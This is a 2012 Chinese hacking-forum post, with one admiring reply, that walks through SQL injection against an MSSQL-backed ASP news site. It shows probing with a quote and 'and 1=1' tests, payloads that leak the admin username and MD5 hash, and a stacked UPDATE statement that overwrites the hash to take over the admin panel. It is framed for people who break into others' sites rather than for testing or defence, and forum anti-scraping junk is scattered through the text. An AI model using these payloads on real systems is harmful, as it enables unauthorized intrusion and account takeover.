找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2792|回复: 1
打印 上一主题 下一主题

SQL注入直接修改管理员密码的MD5值

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:55:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。$ y. A5 b- [" L2 ~0 q- b3 d# G3 l5 f7 E
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
8 ^3 q- c/ z1 w4 C2 \$ u! Y测试如下:
. x, x$ d  S3 m+ z: Z% u( Ghttp://www.tmdsb.com/news.asp?id=121% Y4 ?4 Q( K% U  [: F3 b% T# \" X
在地址后输入单引号,显示; s/ s# M, d! P& e. E
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’, E. m. e  {9 I
字符串 ’’’ 之前有未闭合的引号
5 ]! j& P  l' F) U" z% ~( t/news/tmdws.asp,行63- b% H  P" N- k1 B, x$ d: s
说明没有过滤单引号且数据库是MSSQL.7 g: A! @7 }6 v8 _
and 1=1正常。and 1=2出错。肯定存在注入
9 x' {! Z' ]6 i接着输入4 H1 {) E' a7 v7 g/ B, Q6 }
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)' y. U1 o" V8 p1 T/ S& @3 e
得到帐号为:admin
0 f; H9 b1 X0 S' Z% Yhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)0 q: _0 ^' O( @
得到密码为:a4716077c2ba075c
# y& g/ v9 y! c" {3 |; o接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
& s& X: j% L9 l6 E5 u. B2 U命令如下 :
, V: k: p8 m# B4 O6 {6 l;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–: k& ^, o3 D8 w3 @
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的
回复

使用道具 举报

沙发
发表于 2012-9-14 16:22:41 | 只看该作者
没法说  一个字牛
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表